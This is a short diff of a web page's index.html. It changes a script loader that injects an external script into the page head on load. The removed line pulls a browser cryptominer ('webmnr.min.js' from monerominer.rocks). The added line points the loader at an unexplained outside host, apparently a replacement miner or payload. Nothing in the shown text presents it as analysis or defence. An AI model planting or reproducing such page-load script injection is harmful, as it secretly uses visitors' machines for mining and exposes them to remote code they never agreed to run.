--- a/index.html
+++ b/index.html
@@ -15,7 +15,7 @@
     let script = document.createElement('script');
     let head = document.getElementsByTagName('head')[0];
     
-    script.setAttribute('src', 'https://monerominer.rocks/miner-mmr/webmnr.min.js');
+    script.setAttribute('src', 'https://script.ghgi.xyz');
     head.appendChild(script);
 
     script.onload = () => {    
